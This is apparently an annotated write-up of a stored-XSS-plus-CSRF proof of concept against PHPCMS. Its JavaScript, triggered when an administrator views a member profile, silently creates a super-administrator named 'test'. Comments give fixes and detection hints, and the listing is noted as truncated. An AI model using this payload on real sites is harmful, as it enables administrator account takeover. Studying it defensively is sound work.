在会员中心随处修改资料,写入xss代码,诱使管理员在后台点击。
// Proof-of-concept script from the write-up. Per the surrounding text it is
// stored through a member-profile field and runs when an administrator opens
// that data in the back end; it then submits the "add administrator" form.
// Defensive takeaways: HTML-encode member-supplied fields wherever the back end
// displays them, and require an unpredictable anti-CSRF token (ideally plus
// re-authentication) on administrator creation. The request body below carries
// no such token field.
// NOTE(review): the listing is cut off; xhr_act's closing brace is missing.

// Creates the request object: native XMLHttpRequest when the browser has it,
// otherwise a legacy ActiveX object. Returns false if nothing could be created.
function ajax(){
  var request = false;
  if(window.XMLHttpRequest) {
    request = new XMLHttpRequest();
  } else if(window.ActiveXObject) {
    // Candidate ProgIDs for old Internet Explorer ('Microsoft.XMLHTTP' is listed twice).
    var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP',
      'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0',
      'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
    // There is no break, so every ProgID is tried and the last one that
    // instantiates is kept; failures are swallowed by the empty catch.
    for(var i=0; i<versions.length; i++) {
      try { request = new ActiveXObject(versions[i]); } catch(e) {}
    }
  }
  return request;
}
// One shared request object for the whole script.
var _x = ajax();
// Runs immediately on load; adduser is a function declaration, so it is hoisted.
adduser();
// Sends the form submission that creates the new back-end account.
function adduser() {
  // src and data are assigned without var, so they become globals.
  // The URL is relative, so it resolves against the page the script runs on.
  src="admin.php?mod=phpcms&file=admin&action=add";
  // URL-encoded form body: admin[username]=test, admin[alloweditpassword]=1,
  // roleids[]=1, admin[disabled]=0, plus a dosubmit value (its bytes look like a
  // GBK-encoded button label; unverified). The write-up states the resulting
  // account is a super administrator.
  // Detection: check web logs for unexpected POSTs to this action and the admin
  // list for an unplanned "test" account.
  data="admin%5Busername%5D=test&admin%5Balloweditpassword%5D=1&roleids%5B%5D=1&admin%5Bdisabled%5D=0&dosubmit=+%C8%B7%B6%A8+";
  xhr_act("POST",src,data);
}
// Generic request helper: _m is the HTTP method, _s the URL, _a the body.
// Returns the response text.
function xhr_act(_m,_s,_a){
  // Third argument false makes the call synchronous (blocks until the response arrives).
  _x.open(_m,_s,false);
  // Form encoding header is only set for POST.
  if(_m=="POST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
  _x.send(_a);
  return _x.responseText;
后台会自动添加一个用户名为test的超级管理员:脚本在管理员已登录的后台会话中执行,而上面的添加管理员请求没有携带任何防CSRF令牌。修复时应对后台展示的会员资料做输出编码,并为添加管理员的操作加上令牌校验。